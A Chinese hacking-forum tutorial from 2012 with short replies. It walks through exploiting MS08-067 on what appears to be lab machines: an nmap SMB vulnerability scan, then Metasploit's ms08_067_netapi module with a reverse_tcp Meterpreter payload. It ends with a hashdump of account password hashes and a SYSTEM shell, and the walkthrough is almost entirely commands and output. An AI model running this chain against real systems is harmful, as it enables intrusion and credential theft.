切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
6. MSF进行一次溢出攻击[复制链接]
发表于 2012-8-4 17:00:21 | 显示全部楼层 |!read_mode!
打开uB1和 XP2 1
先用nmap看看目标存在漏洞不?
  1. root@Dis9Team:/pen/nmap/share/nmap/scripts# ls | grep smb
  2. smb-brute.nse
  3. smb-check-vulns.nse
  4. smb-enum-domains.nse
  5. smb-enum-groups.nse
  6. smb-enum-processes.nse
  7. smb-enum-sessions.nse
  8. smb-enum-shares.nse
  9. smb-enum-users.nse
  10. smb-flood.nse
  11. smb-os-discovery.nse
  12. smb-psexec.nse
  13. smb-security-mode.nse
  14. smb-server-stats.nse
  15. smb-system-info.nse
  16. smbv2-enabled.nse
  17. root@Dis9Team:/pen/nmap/share/nmap/scripts#
复制代码
smb-check-vulns.nse这个脚本是扫描SMB漏洞的
  1. root@Dis9Team:~# nmap --script=smb-check-vulns 5.5.5.3 -p 445 -T5 -sS

  2. Starting Nmap 5.51 ( http://nmap.org ) at 2012-05-11 23:47 CST
  3. Nmap scan report for 5.5.5.3
  4. Host is up (0.00078s latency).
  5. PORT    STATE SERVICE
  6. 445/tcp open  microsoft-ds
  7. MAC Address: 08:08:27:00:00:02 (Unknown)

  8. Host script results:
  9. | smb-check-vulns:
  10. |   MS08-067: VULNERABLE
  11. |   Conficker: Likely CLEAN
  12. |   regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
  13. |   SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
  14. |   MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
  15. |_  MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)

  16. Nmap done: 1 IP address (1 host up) scanned in 6.28 seconds
  17. root@Dis9Team:~#
复制代码


如果你想获得全部脚本扫描系统你可以这么干:
  1. root@Dis9Team:~# nmap --script=smb* 5.5.5.3 -p 445 -T5 -sS
复制代码
利用smb开头的脚本扫描
存在好多漏洞 利用MS08-067吧
启动METASPLOIT
  1. root@Dis9Team:~# msfconsole
复制代码
搜索漏洞:
  1. msf > search MS08-067

  2. Matching Modules
  3. ================

  4.    Name                                 Disclosure Date  Rank   Description
  5.    ----                                 ---------------  ----   -----------
  6.    exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Microsoft Server Service Relative Path Stack Corruption


  7. msf >
复制代码
进入漏洞模块
  1. msf > use exploit/windows/smb/ms08_067_netapi
  2. msf  exploit(ms08_067_netapi) >
复制代码
查看漏洞信息
  1. msf  exploit(ms08_067_netapi) > info

  2.        Name: Microsoft Server Service Relative Path Stack Corruption
  3.      Module: exploit/windows/smb/ms08_067_netapi
  4.     Version: 14976
  5.    Platform: Windows
  6. Privileged: Yes
  7.     License: Metasploit Framework License (BSD)
  8.        Rank: Great

  9. Provided by:
  10.   hdm
  11.   Brett Moore

  12.   staylor
  13.   jduck

  14. Available targets:
  15.   Id  Name
  16.   --  ----
  17.   0   Automatic Targeting
  18.   1   Windows 2000 Universal
  19. ----------------------------
  20.   62  Windows XP SP3 Turkish (NX)
  21.   63  Windows 2003 SP2 Japanese (NO NX)

  22. Basic options:
  23.   Name     Current Setting  Required  Description
  24.   ----     ---------------  --------  -----------
  25.   RHOST                     yes       The target address
  26.   RPORT    445              yes       Set the SMB service port
  27.   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

  28. Payload information:
  29.   Space: 400
  30.   Avoid: 8 characters

  31. Description:
  32.   This module exploits a parsing flaw in the path canonicalization
  33.   code of NetAPI32.dll through the Server Service. This module is
  34.   capable of bypassing NX on some operating systems and service packs.
  35.   The correct target must be used to prevent the Server Service (along
  36.   with a dozen others in the same process) from crashing. Windows XP
  37.   targets seem to handle multiple successful exploitation events, but
  38.   2003 targets will often crash or hang on subsequent attempts. This
  39.   is just the first version of this module, full support for NX bypass
  40.   on 2003, along with other platforms, is still in development.

  41. References:
  42.   http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-4250
  43.   http://www.osvdb.org/49243
  44.   http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx
  45.   http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos

  46. msf  exploit(ms08_067_netapi) >
复制代码
查看漏洞配置:
  1. msf  exploit(ms08_067_netapi) > show options

  2. Module options (exploit/windows/smb/ms08_067_netapi):

  3.    Name     Current Setting  Required  Description
  4.    ----     ---------------  --------  -----------
  5.    RHOST                     yes       The target address
  6.    RPORT    445              yes       Set the SMB service port
  7.    SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


  8. Exploit target:

  9.    Id  Name
  10.    --  ----
  11.    0   Automatic Targeting


  12. msf  exploit(ms08_067_netapi) >
复制代码
写入目标:
  1. msf  exploit(ms08_067_netapi) > set RHOST 5.5.5.3
  2. RHOST => 5.5.5.3
复制代码
写入后门方式(后门方式以后会详细介绍):
  1. msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
  2. PAYLOAD => windows/meterpreter/reverse_tcp
  3. msf  exploit(ms08_067_netapi) >
复制代码
上面的这个是一个DLL劫持的TCP后门
再次查看配置:
  1. msf  exploit(ms08_067_netapi) > show options

  2. Module options (exploit/windows/smb/ms08_067_netapi):

  3.    Name     Current Setting  Required  Description
  4.    ----     ---------------  --------  -----------
  5.    RHOST    5.5.5.3          yes       The target address
  6.    RPORT    445              yes       Set the SMB service port
  7.    SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


  8. Payload options (windows/meterpreter/reverse_tcp):

  9.    Name      Current Setting  Required  Description
  10.    ----      ---------------  --------  -----------
  11.    EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
  12.    LHOST                      yes       The listen address
  13.    LPORT     4444             yes       The listen port


  14. Exploit target:

  15.    Id  Name
  16.    --  ----
  17.    0   Automatic Targeting


  18. msf  exploit(ms08_067_netapi) >
复制代码
多了一个Payload options选项
写入Payload options选项的本地监听IP
  1. msf  exploit(ms08_067_netapi) > set LHOST 5.5.5.5
  2. LHOST => 5.5.5.5
复制代码
查看目标系统:
  1. msf  exploit(ms08_067_netapi) > show targets

  2. Exploit targets:

  3.    Id  Name
  4.    --  ----
  5.    0   Automatic Targeting
  6.    1   Windows 2000 Universal
  7.    2   Windows XP SP0/SP1 Universal
  8.    3   Windows XP SP2 English (AlwaysOn NX)
  9. ----------------------------
  10.    63  Windows 2003 SP2 Japanese (NO NX)


  11. msf  exploit(ms08_067_netapi) >
复制代码
有63个 我们用nmap扫描下目标系统
  1. root@Dis9Team:~# nmap -O 5.5.5.3

  2. Starting Nmap 5.51 ( http://nmap.org ) at 2012-05-12 00:18 CST
  3. Nmap scan report for 5.5.5.3
  4. Host is up (0.0014s latency).
  5. Not shown: 997 closed ports
  6. PORT    STATE SERVICE
  7. 135/tcp open  msrpc
  8. 139/tcp open  netbios-ssn
  9. 445/tcp open  microsoft-ds
  10. MAC Address: 08:08:27:00:00:02 (Unknown)
  11. Device type: general purpose
  12. Running: Microsoft Windows XP|2003
  13. OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003
  14. Network Distance: 1 hop

  15. OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
  16. Nmap done: 1 IP address (1 host up) scanned in 8.90 seconds
  17. root@Dis9Team:~#
复制代码
OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003
我们找下XP2的简体中文
   17  Windows XP SP2 Chinese - Simplified (NX)
是17  写入目标:
  1. msf  exploit(ms08_067_netapi) > set TARGET 17
  2. TARGET => 17
复制代码
溢出利用
  1. msf  exploit(ms08_067_netapi) > exploit

  2. [*] Started reverse handler on 5.5.5.5:4444
  3. [*] Attempting to trigger the vulnerability...
  4. [*] Sending stage (752128 bytes) to 5.5.5.3
  5. [*] Meterpreter session 1 opened (5.5.5.5:4444 -> 5.5.5.3:1047) at 2012-05-12 00:20:04 +0800

  6. meterpreter >
复制代码
获得HASH:
  1. meterpreter > run post/windows/gather/hashdump

  2. [*] Obtaining the boot key...
  3. [*] Calculating the hboot key using SYSKEY 93bff8a1e439b8295b2b15e6ea866265...
  4. [*] Obtaining the user list and keys...
  5. [*] Decrypting user keys...
  6. [*] Dumping password hashes...


  7. Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
  8. Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  9. HelpAssistant:1000:b0cda684b399c4c78f372dd9a09e97d9:e4ba8d4915472ef17037a1b8f6cfb86b:::
  10. SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:a4ad77912a1ffe62db66144036652be1:::
  11. brk:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::


  12. meterpreter >
复制代码
获得CMD.EXE
  1. meterpreter > getuid
  2. Server username: NT AUTHORITY\SYSTEM
  3. meterpreter > shell
复制代码



附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。
发表于 2014-8-16 20:13:44 | 显示全部楼层
Phant0m0308
发表于 2014-8-17 05:16:11 | 显示全部楼层
神马意思?
关闭本帖子回复于mobile客户端!
发表于 2014-8-17 13:20:02 | 显示全部楼层
店小二01 发表于 2014-8-17 05:16
神马意思?

哎,没文化真可怕,幽灵里面的id啊
发表于 2015-3-14 09:39:56 | 显示全部楼层
这个是顶级的渗透工具
发表于 2015-9-15 14:38:53 | 显示全部楼层

发表于 2015-9-15 16:15:19 | 显示全部楼层
瞧一瞧看一看
发表于 2015-10-8 15:22:35 | 显示全部楼层
不错。。学习了。。good
发表于 2016-1-25 16:50:24 | 显示全部楼层
不错。。学习了。。good

代码区

GMT+8, 2020-10-1 21:57

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部